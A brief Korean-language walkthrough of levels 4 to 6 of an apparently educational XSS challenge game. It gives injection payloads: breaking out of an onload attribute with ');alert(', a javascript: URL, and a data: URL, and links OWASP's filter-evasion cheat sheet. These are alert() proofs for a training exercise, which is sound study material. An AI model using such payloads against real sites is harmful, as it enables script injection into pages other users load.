level 4

onload="startTimer('{{timer}}')" 의 timer 부분이 유저가 입력한 값이 들어가는 부분이다

<img src="/static/loading.gif" onload="startTimer('{{ ');alert(' }}');" />

가 되도록 ');alert('을 입력한다

level 5

url로 스크립트를 전달한다

javascript:alert()

https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html

level 6

data:text/javascipt,alert();

Data URL Schema를 사용한다
data:[미디어타입][;인코딩방식],<데이터>